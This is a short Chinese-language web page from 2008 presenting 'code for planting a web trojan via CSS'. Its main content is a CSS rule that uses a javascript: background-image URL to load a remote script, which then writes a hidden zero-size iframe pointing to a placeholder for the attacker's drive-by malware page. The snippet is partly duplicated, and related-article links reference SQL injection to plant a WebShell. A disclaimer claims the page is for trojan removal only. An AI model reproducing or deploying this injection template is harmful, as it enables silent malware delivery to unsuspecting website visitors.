利用css實現(xiàn)掛馬的代碼
更新時間:2008年01月06日 19:54:45 作者:
本站只是提供知識,方便大家以后的查殺木馬,不是用來搞破壞
body {
background-image: url('javascript:document.write(”<script src=http://www.dbjr.com.cn/9xiao.js></script>”)')
}
9xiao.js內(nèi)容是 document.write(”<iframe src=你的網(wǎng)馬 width=0 height=0></iframe>”)
background-image: url('javascript:document.write(”<script src=http://www.dbjr.com.cn/9xiao.js></script>”)')
}
9xiao.js內(nèi)容是 document.write(”<iframe src=你的網(wǎng)馬 width=0 height=0></iframe>”)
相關(guān)文章
MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法
MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法...2007-10-10MySQL注入中導(dǎo)出字段內(nèi)容的研究通過注入導(dǎo)出WebShell
大家都知道,在MySQL中,無法像MSSQL那樣執(zhí)行script.asp?id=1;insert into table (field) values('angel');--來插入數(shù)據(jù),因為MySQL里最多就是用union聯(lián)合查詢。2008-05-05